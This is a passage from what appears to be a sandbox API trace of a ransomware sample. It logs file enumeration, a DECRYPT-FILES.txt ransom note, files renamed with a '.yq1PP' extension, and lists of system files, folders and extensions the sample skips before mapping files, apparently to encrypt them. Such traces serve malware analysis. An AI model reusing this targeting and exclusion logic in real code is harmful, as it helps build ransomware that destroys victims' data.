lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabda3140, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xabda3140, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabdc92a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0182.177] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0182.177] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x50fa8bb0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x50fa8bb0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xabdef400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1c108, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat.yq1PP", cAlternateFileName="INDEXD~1.YQ1")) returned 1 [0182.177] lstrcmpiW (lpString1="index.dat.yq1PP", lpString2="DECRYPT-FILES.txt") returned 1 [0182.177] lstrcmpiW (lpString1="index.dat.yq1PP", lpString2="autorun.inf") returned 1 [0182.177] lstrcmpiW (lpString1="index.dat.yq1PP", lpString2="boot.ini") returned 1 [0182.177] lstrcmpiW (lpString1="index.dat.yq1PP", lpString2="desktop.ini") returned 1 [0182.177] lstrcmpiW (lpString1="index.dat.yq1PP", lpString2="ntuser.dat") returned -1 [0182.177] lstrcmpiW (lpString1="index.dat.yq1PP", lpString2="iconcache.db") returned 1 [0182.177] lstrcmpiW (lpString1="index.dat.yq1PP", lpString2="bootsect.bak") returned 1 [0182.177] lstrcmpiW (lpString1="index.dat.yq1PP", lpString2="ntuser.dat.log") returned -1 [0182.177] lstrcmpiW (lpString1="index.dat.yq1PP", lpString2="thumbs.db") returned -1 [0182.177] lstrcmpiW (lpString1="index.dat.yq1PP", lpString2="Bootfont.bin") returned 1 [0182.177] lstrlenW (lpString="index.dat.yq1PP") returned 15 [0182.177] lstrcmpiW (lpString1="yq1PP", lpString2="lnk") returned 1 [0182.177] lstrcmpiW (lpString1="yq1PP", lpString2="exe") returned 1 [0182.177] lstrcmpiW (lpString1="yq1PP", lpString2="sys") returned 1 [0182.177] lstrcmpiW (lpString1="yq1PP", lpString2="dll") returned 1 [0182.177] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\") returned 77 [0182.177] lstrlenW (lpString="index.dat.yq1PP") returned 15 [0182.177] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\" [0182.177] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpString2="index.dat.yq1PP" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\index.dat.yq1PP") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\index.dat.yq1PP" [0182.177] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.177] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\index.dat.yq1PP" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\privacie\\low\\index.dat.yq1pp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0182.178] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=114952) returned 1 [0182.178] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0182.178] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0182.179] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0182.179] CloseHandle (hObject=0x288) returned 1 [0182.179] CloseHandle (hObject=0x284) returned 1 [0182.179] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.179] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x50fa8bb0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x50fa8bb0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xabdef400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1c108, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat.yq1PP", cAlternateFileName="INDEXD~1.YQ1")) returned 0 [0182.179] FindClose (in: hFindFile=0x4799b8 | out: hFindFile=0x4799b8) returned 1 [0182.179] CloseHandle (hObject=0x27c) returned 1 [0182.179] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xabe15560, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabe15560, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low\\", cAlternateFileName="")) returned 0 [0182.179] FindClose (in: hFindFile=0x479978 | out: hFindFile=0x479978) returned 1 [0182.179] CloseHandle (hObject=0x274) returned 1 [0182.179] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0108020, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0108020, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0182.180] lstrcmpW (lpString1="Recent", lpString2=".") returned 1 [0182.180] lstrcmpW (lpString1="Recent", lpString2="..") returned 1 [0182.180] lstrcatW (in: lpString1="Recent", lpString2="\\" | out: lpString1="Recent\\") returned="Recent\\" [0182.180] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="Recent\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\" [0182.180] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpSrch="\\Program Files") returned 0x0 [0182.180] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpSrch=":\\Windows") returned 0x0 [0182.180] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpSrch="\\Games\\") returned 0x0 [0182.180] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpSrch="\\Tor Browser\\") returned 0x0 [0182.180] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpSrch="\\ProgramData\\") returned 0x0 [0182.180] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0182.180] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0182.180] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0182.180] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpSrch="\\All Users") returned 0x0 [0182.180] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpSrch="\\IETldCache\\") returned 0x0 [0182.180] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpSrch="\\Local Settings\\") returned 0x0 [0182.180] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpSrch="\\AppData\\Local") returned 0x0 [0182.180] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpSrch="AhnLab") returned 0x0 [0182.180] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0182.180] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\") returned 71 [0182.180] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.180] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\\\0a16c9.tmp") returned 82 [0182.180] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x274 [0182.184] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\") returned 71 [0182.184] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0182.184] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\\\DECRYPT-FILES.txt") returned 89 [0182.184] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.185] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\") returned 71 [0182.185] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*" [0182.185] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*", lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xef9bb660, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xef9bb660, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479978 [0182.185] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0182.185] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xef9bb660, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xef9bb660, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.186] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0182.187] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0182.187] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b10bab0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8b10bab0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8b10bab0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xa37, dwReserved0=0x0, dwReserved1=0x0, cFileName="-keodEgSHy.lnk", cAlternateFileName="-KEODE~1.LNK")) returned 1 [0182.187] lstrcmpiW (lpString1="-keodEgSHy.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0182.187] lstrcmpiW (lpString1="-keodEgSHy.lnk", lpString2="autorun.inf") returned 1 [0182.187] lstrcmpiW (lpString1="-keodEgSHy.lnk", lpString2="boot.ini") returned 1 [0182.187] lstrcmpiW (lpString1="-keodEgSHy.lnk", lpString2="desktop.ini") returned 1 [0182.187] lstrcmpiW (lpString1="-keodEgSHy.lnk", lpString2="ntuser.dat") returned -1 [0182.187] lstrcmpiW (lpString1="-keodEgSHy.lnk", lpString2="iconcache.db") returned 1 [0182.187] lstrcmpiW (lpString1="-keodEgSHy.lnk", lpString2="bootsect.bak") returned 1 [0182.187] lstrcmpiW (lpString1="-keodEgSHy.lnk", lpString2="ntuser.dat.log") returned -1 [0182.187] lstrcmpiW (lpString1="-keodEgSHy.lnk", lpString2="thumbs.db") returned -1 [0182.187] lstrcmpiW (lpString1="-keodEgSHy.lnk", lpString2="Bootfont.bin") returned 1 [0182.187] lstrlenW (lpString="-keodEgSHy.lnk") returned 14 [0182.187] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.187] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ad53850, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8ad53850, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8ad53850, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xf9c, dwReserved0=0x0, dwReserved1=0x0, cFileName="-Wm-t35s2VO0tWM.lnk", cAlternateFileName="-WM-T3~1.LNK")) returned 1 [0182.187] lstrcmpiW (lpString1="-Wm-t35s2VO0tWM.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0182.187] lstrcmpiW (lpString1="-Wm-t35s2VO0tWM.lnk", lpString2="autorun.inf") returned 1 [0182.187] lstrcmpiW (lpString1="-Wm-t35s2VO0tWM.lnk", lpString2="boot.ini") returned 1 [0182.187] lstrcmpiW (lpString1="-Wm-t35s2VO0tWM.lnk", lpString2="desktop.ini") returned 1 [0182.187] lstrcmpiW (lpString1="-Wm-t35s2VO0tWM.lnk", lpString2="ntuser.dat") returned 1 [0182.187] lstrcmpiW (lpString1="-Wm-t35s2VO0tWM.lnk", lpString2="iconcache.db") returned 1 [0182.187] lstrcmpiW (lpString1="-Wm-t35s2VO0tWM.lnk", lpString2="bootsect.bak") returned 1 [0182.187] lstrcmpiW (lpString1="-Wm-t35s2VO0tWM.lnk", lpString2="ntuser.dat.log") returned 1 [0182.187] lstrcmpiW (lpString1="-Wm-t35s2VO0tWM.lnk", lpString2="thumbs.db") returned 1 [0182.187] lstrcmpiW (lpString1="-Wm-t35s2VO0tWM.lnk", lpString2="Bootfont.bin") returned 1 [0182.187] lstrlenW (lpString="-Wm-t35s2VO0tWM.lnk") returned 19 [0182.187] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.187] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a890c50, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8a890c50, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8a890c50, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xa4d, dwReserved0=0x0, dwReserved1=0x0, cFileName="-_DUtxFwiSOA_.lnk", cAlternateFileName="-_DUTX~1.LNK")) returned 1 [0182.187] lstrcmpiW (lpString1="-_DUtxFwiSOA_.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0182.187] lstrcmpiW (lpString1="-_DUtxFwiSOA_.lnk", lpString2="autorun.inf") returned -1 [0182.187] lstrcmpiW (lpString1="-_DUtxFwiSOA_.lnk", lpString2="boot.ini") returned -1 [0182.187] lstrcmpiW (lpString1="-_DUtxFwiSOA_.lnk", lpString2="desktop.ini") returned -1 [0182.187] lstrcmpiW (lpString1="-_DUtxFwiSOA_.lnk", lpString2="ntuser.dat") returned -1 [0182.187] lstrcmpiW (lpString1="-_DUtxFwiSOA_.lnk", lpString2="iconcache.db") returned -1 [0182.188] lstrcmpiW (lpString1="-_DUtxFwiSOA_.lnk", lpString2="bootsect.bak") returned -1 [0182.188] lstrcmpiW (lpString1="-_DUtxFwiSOA_.lnk", lpString2="ntuser.dat.log") returned -1 [0182.188] lstrcmpiW (lpString1="-_DUtxFwiSOA_.lnk", lpString2="thumbs.db") returned -1 [0182.188] lstrcmpiW (lpString1="-_DUtxFwiSOA_.lnk", lpString2="Bootfont.bin") returned -1 [0182.188] lstrlenW (lpString="-_DUtxFwiSOA_.lnk") returned 17 [0182.188] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.188] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89ebf190, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x89ebf190, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x89ebf190, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x992, dwReserved0=0x0, dwReserved1=0x0, cFileName="0 cG.mkv.lnk", cAlternateFileName="0CGMKV~1.LNK")) returned 1 [0182.188] lstrcmpiW (lpString1="0 cG.mkv.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0182.188] lstrcmpiW (lpString1="0 cG.mkv.lnk", lpString2="autorun.inf") returned -1 [0182.188] lstrcmpiW (lpString1="0 cG.mkv.lnk", lpString2="boot.ini") returned -1 [0182.188] lstrcmpiW (lpString1="0 cG.mkv.lnk", lpString2="desktop.ini") returned -1 [0182.188] lstrcmpiW (lpString1="0 cG.mkv.lnk", lpString2="ntuser.dat") returned -1 [0182.188] lstrcmpiW (lpString1="0 cG.mkv.lnk", lpString2="iconcache.db") returned -1 [0182.188] lstrcmpiW (lpString1="0 cG.mkv.lnk", lpString2="bootsect.bak") returned -1 [0182.188] lstrcmpiW (lpString1="0 cG.mkv.lnk", lpString2="ntuser.dat.log") returned -1 [0182.188] lstrcmpiW (lpString1="0 cG.mkv.lnk", lpString2="thumbs.db") returned -1 [0182.188] lstrcmpiW (lpString1="0 cG.mkv.lnk", lpString2="Bootfont.bin") returned -1 [0182.188] lstrlenW (lpString="0 cG.mkv.lnk") returned 12 [0182.188] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.188] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef9bb660, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xef9bb660, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xef9bb660, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0182.188] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0182.188] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0182.188] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0182.188] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0182.188] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0182.188] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0182.188] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0182.188] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0182.188] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0182.188] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0182.188] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.188] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0182.188] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0182.188] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0182.189] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0182.189] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\") returned 71 [0182.189] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.189] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\" [0182.189] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\0a16c9.tmp" [0182.189] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.189] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.189] CloseHandle (hObject=0x0) returned 0 [0182.189] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.189] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a6edd30, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8a6edd30, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8a6edd30, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xa84, dwReserved0=0x0, dwReserved1=0x0, cFileName="0Vab-9jdPOdBqrE6M.lnk", cAlternateFileName="0VAB-9~1.LNK")) returned 1 [0182.189] lstrcmpiW (lpString1="0Vab-9jdPOdBqrE6M.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0182.189] lstrcmpiW (lpString1="0Vab-9jdPOdBqrE6M.lnk", lpString2="autorun.inf") returned -1 [0182.189] lstrcmpiW (lpString1="0Vab-9jdPOdBqrE6M.lnk", lpString2="boot.ini") returned -1 [0182.189] lstrcmpiW (lpString1="0Vab-9jdPOdBqrE6M.lnk", lpString2="desktop.ini") returned -1 [0182.189] lstrcmpiW (lpString1="0Vab-9jdPOdBqrE6M.lnk", lpString2="ntuser.dat") returned -1 [0182.189] lstrcmpiW (lpString1="0Vab-9jdPOdBqrE6M.lnk", lpString2="iconcache.db") returned -1 [0182.190] lstrcmpiW (lpString1="0Vab-9jdPOdBqrE6M.lnk", lpString2="bootsect.bak") returned -1 [0182.190] lstrcmpiW (lpString1="0Vab-9jdPOdBqrE6M.lnk", lpString2="ntuser.dat.log") returned -1 [0182.190] lstrcmpiW (lpString1="0Vab-9jdPOdBqrE6M.lnk", lpString2="thumbs.db") returned -1 [0182.190] lstrcmpiW (lpString1="0Vab-9jdPOdBqrE6M.lnk", lpString2="Bootfont.bin") returned -1 [0182.190] lstrlenW (lpString="0Vab-9jdPOdBqrE6M.lnk") returned 21 [0182.190] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.190] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ac95170, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8ac95170, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8ac95170, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x3e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="1ek gB-.lnk", cAlternateFileName="1EKGB-~1.LNK")) returned 1 [0182.190] lstrcmpiW (lpString1="1ek gB-.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0182.190] lstrcmpiW (lpString1="1ek gB-.lnk", lpString2="autorun.inf") returned -1 [0182.190] lstrcmpiW (lpString1="1ek gB-.lnk", lpString2="boot.ini") returned -1 [0182.190] lstrcmpiW (lpString1="1ek gB-.lnk", lpString2="desktop.ini") returned -1 [0182.190] lstrcmpiW (lpString1="1ek gB-.lnk", lpString2="ntuser.dat") returned -1 [0182.190] lstrcmpiW (lpString1="1ek gB-.lnk", lpString2="iconcache.db") returned -1 [0182.190] lstrcmpiW (lpString1="1ek gB-.lnk", lpString2="bootsect.bak") returned -1 [0182.190] lstrcmpiW 